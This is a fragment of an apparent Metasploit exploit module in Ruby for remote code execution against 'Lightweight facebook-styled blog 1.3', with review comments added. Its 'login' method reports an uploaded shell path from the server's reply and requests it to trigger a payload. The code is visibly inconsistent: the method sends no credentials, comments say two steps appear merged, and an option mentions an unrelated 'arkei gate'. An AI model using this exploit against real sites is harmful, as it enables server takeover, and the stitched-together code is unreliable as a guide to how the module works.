register_options(
[
OptString.new('USERNAME', [true, 'Blog username', 'demo']),
OptString.new('PASSWORD', [true, 'Blog password', 'demo']),
OptString.new('TARGETURI', [true, 'The URI of the arkei gate', '/'])
]
)
end
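# Requests the application's base URI and acts on the JSON document in the reply.
#
# NOTE(review): despite its name, the visible body sends no credentials. The
# USERNAME datastore option is only interpolated into a status message, and the
# second half reports a 'path' from the reply and then requests it. This looks
# like a login step and a later step merged together; confirm against the
# complete module before relying on either the name or the messages.
#
# @return [Array(nil, nil)] when there is no response, the status is not 200,
#   or the JSON reply carries an 'error' key
# @return [Object] otherwise, whatever the final print_good call returns
# @raise whatever fail_with raises, when the JSON reply is empty or has no
#   'path' key
def login
  res = send_request_cgi(
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path)
  )

  # The response may be nil (the original guarded with `res &&`), so report
  # that case instead of calling #code on nil.
  unless res
    print_error('Login failed! No response from server')
    return nil, nil
  end

  unless res.code == 200
    print_error("Login failed! Status code #{res.code}")
    return nil, nil
  end

  json = res.get_json_document

  # The original tested `json.empty? && json['error']`, which can never be
  # true: a document holding an 'error' key is not empty. Check the key itself
  # so an error reported with HTTP 200 is treated as a failed login.
  if json['error']
    print_error('Login failed!')
    return nil, nil
  end

  # Report success only once the failure cases above have been ruled out.
  print_good("Successfully logged in with #{datastore['USERNAME']}")

  # An empty document (e.g. an unparseable body) or one without 'path' is not
  # a reply this method knows how to handle.
  if json.empty? || !json['path']
    fail_with(Failure::UnexpectedReply, 'Unexpected json response')
  end
  print_good("Shell uploaded as #{json['path']}")

  # Follow-up GET for the server-supplied path, with a 3 second timeout; the
  # response is not inspected.
  send_request_cgi({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, json['path'])
  }, 3)
  print_good("Payload successfully triggered !")
end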
end
Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)